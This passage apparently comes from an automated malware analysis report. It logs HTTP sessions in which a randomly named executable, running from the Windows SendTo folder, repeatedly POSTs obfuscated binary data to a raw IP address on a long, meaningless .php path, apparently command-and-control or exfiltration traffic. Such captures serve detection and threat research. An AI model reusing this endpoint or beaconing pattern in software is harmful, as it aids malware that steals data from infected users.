                                          Sep 13, 2024 21:02:30.425770998 CEST2100OUTData Raw: 5e 52 46 53 55 43 59 53 59 5f 51 51 52 50 54 51 5a 59 5a 58 55 50 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RFSUCYSY_QQRPTQZYZXUPS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C?6[72=^"#%=;.R<=Z*7<<>0 4&?D%<<^29[&!^-
                                          Sep 13, 2024 21:02:30.837603092 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:31.002846956 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0b 3c 1f 3b 56 24 15 3b 50 2c 3d 0c 57 27 3c 2c 59 2b 55 32 1a 28 3e 23 04 2e 04 25 00 33 3b 03 5a 30 3f 3f 1f 27 01 02 0a 3d 10 2e 46 0d 1d 26 05 3e 2f 0e 56 3e 3e 20 58 30 10 0c 04 20 0e 1e 05 27 59 23 53 20 05 26 5a 21 22 2f 52 26 3a 3e 01 2c 36 36 15 2a 1f 39 01 37 36 2e 55 0f 15 3a 0b 26 1f 04 54 3c 21 3f 5b 28 3f 0b 0c 32 2f 0a 0f 31 05 2c 52 24 28 29 0d 25 59 35 5d 25 08 23 5b 2b 2d 35 1e 20 21 0c 53 22 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<;V$;P,=W'<,Y+U2(>#.%3;Z0??'=.F&>/V>> X0 'Y#S &Z!"/R&:>,66*976.U:&T<!?[(?2/1,R$()%Y5]%#[+-5 !S"'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.45667131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:31.720515013 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:32.066375017 CEST2532OUTData Raw: 5e 56 43 52 55 4a 5c 50 59 5f 51 51 52 5e 54 51 5a 5c 5a 5b 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCRUJ\PY_QQR^TQZ\Z[URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+6Z#1*7!])+<?=*7+<>[$ <2?B1 '+9[&!^-
                                          Sep 13, 2024 21:02:32.462976933 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:32.592562914 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.45667331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:32.850545883 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:33.207084894 CEST2532OUTData Raw: 5b 50 43 51 55 47 5c 50 59 5f 51 51 52 5f 54 50 5a 52 5a 5b 55 57 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCQUG\PY_QQR_TPZRZ[UWSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<Y.X#16"3Y>(")8),>0 /&)<&4%9[&!^-;
                                          Sep 13, 2024 21:02:33.604758978 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:33.738260984 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:33.953883886 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.45667431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:36.064646959 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2080
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:36.410722017 CEST2080OUTData Raw: 5e 54 43 53 55 47 5c 51 59 5f 51 51 52 51 54 55 5a 5e 5a 5f 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TCSUG\QY_QQRQTUZ^Z_UWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+Y2Z71" !Y*81=,%) V?<"Z'U/%,&/329[&!^-
                                          Sep 13, 2024 21:02:36.800841093 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:36.935208082 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 55 3f 08 01 1d 24 5d 37 52 2f 03 00 1a 33 3f 05 00 28 33 2d 09 2b 13 28 13 2e 2a 0b 02 30 5d 22 02 24 12 27 5b 27 3f 33 51 29 00 2e 46 0d 1d 26 05 3e 3f 24 53 29 2e 2f 01 30 58 29 59 23 09 3c 05 33 11 33 11 23 3f 39 02 37 0b 3b 1c 26 29 3d 5d 2c 35 00 5d 2a 1f 3d 00 37 1c 2e 55 0f 15 39 1b 32 32 22 51 29 32 2f 13 28 3f 36 12 31 3f 0a 0d 25 2b 24 50 27 06 00 57 24 3f 08 01 25 22 2f 5c 28 13 08 0d 21 31 39 0f 22 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989U?$]7R/3?(3-+(.*0]"$'['?3Q).F&>?$S)./0X)Y#<33#?97;&)=],5]*=7.U922"Q)2/(?61?%+$P'W$?%"/\(!19"+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.45667531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:38.228748083 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:38.582024097 CEST2532OUTData Raw: 5b 53 43 52 55 43 5c 52 59 5f 51 51 52 50 54 56 5a 5f 5a 50 55 57 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCRUC\RY_QQRPTVZ_ZPUWSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<1 %4:)+?/>8?<&'U/&B%;19[&!^-
                                          Sep 13, 2024 21:02:38.993311882 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:39.247961044 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:39.248002052 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.45667631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:39.677284956 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:40.087510109 CEST2532OUTData Raw: 5b 56 43 50 55 42 59 56 59 5f 51 51 52 58 54 56 5a 5d 5a 5f 55 54 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCPUBYVY_QQRXTVZ]Z_UTSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(: "" !])+:<,)Z)80<?:$7&?C1,4';9[&!^-'
                                          Sep 13, 2024 21:02:40.313257933 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:40.444818974 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.45667731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:41.002789021 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:41.348377943 CEST2532OUTData Raw: 5e 52 43 57 50 43 59 51 59 5f 51 51 52 58 54 54 5a 5c 5a 5b 55 5e 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCWPCYQY_QQRXTTZ\Z[U^SAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(?1!1> #>81(/*)8$P+<-$34&7A%2;9[&!^-'
                                          Sep 13, 2024 21:02:41.745639086 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:41.893546104 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.45667831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:41.947532892 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2100
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:42.300791979 CEST2100OUTData Raw: 5e 55 46 52 50 41 59 5d 59 5f 51 51 52 50 54 56 5a 5a 5a 59 55 55 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UFRPAY]Y_QQRPTVZZZYUUSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(?% 2% 0=Y)-<&)4+,&$2?D17%9[&!^-
                                          Sep 13, 2024 21:02:42.699815989 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:42.830252886 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:42 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0b 28 1f 3f 51 27 38 37 51 3b 3d 0c 50 26 2f 0d 05 2b 23 26 1b 29 2e 27 01 2d 5c 32 12 27 2b 21 5c 27 3c 0e 03 24 01 3b 50 3d 3a 2e 46 0d 1d 26 00 29 11 33 0c 29 58 3c 10 24 2e 29 5e 37 20 15 16 24 3f 38 0e 20 5a 3e 11 20 1c 2b 1e 25 2a 3d 5a 2d 26 2e 5f 3d 31 21 03 21 26 2e 55 0f 15 39 1b 26 0f 21 0e 3f 32 3b 5e 3e 01 25 0d 27 2f 0a 0c 32 02 2c 1a 30 06 26 52 32 3f 2e 05 25 22 3f 5c 3c 3e 25 56 21 31 2d 0b 35 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:(?Q'87Q;=P&/+#&).'-\2'+!\'<$;P=:.F&)3)X<$.)^7 $?8 Z> +%*=Z-&._=1!!&.U9&!?2;^>%'/2,0&R2?.%"?\<>%V!1-5'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.45668031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:42.111809969 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:42.457072020 CEST2532OUTData Raw: 5b 55 46 55 50 43 59 55 59 5f 51 51 52 58 54 57 5a 58 5a 5b 55 53 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFUPCYUY_QQRXTWZXZ[USSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*/41973>(;9=?.+; Q+,Z%3$:E%2;9[&!^-'
                                          Sep 13, 2024 21:02:42.765607119 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:42.919722080 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:42 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.45668131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:43.635905027 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:43.988373041 CEST2532OUTData Raw: 5e 54 46 53 55 4b 5c 56 59 5f 51 51 52 5d 54 54 5a 5f 5a 5f 55 56 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFSUK\VY_QQR]TTZ_Z_UVSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B?! T54U&)+"S=/!Y)U("$ ,U2971#%;9[&!^-3
                                          Sep 13, 2024 21:02:44.372663975 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:44.525691032 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.45668331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:45.140120029 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:45.488323927 CEST2532OUTData Raw: 5e 51 43 5f 55 4a 59 51 59 5f 51 51 52 5a 54 55 5a 59 5a 5d 55 55 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QC_UJYQY_QQRZTUZYZ]UUSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+%#29X" =X)2W+)?-$'&?B%29[&!^-/
                                          Sep 13, 2024 21:02:45.874775887 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:46.010775089 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.45668431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:46.788984060 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
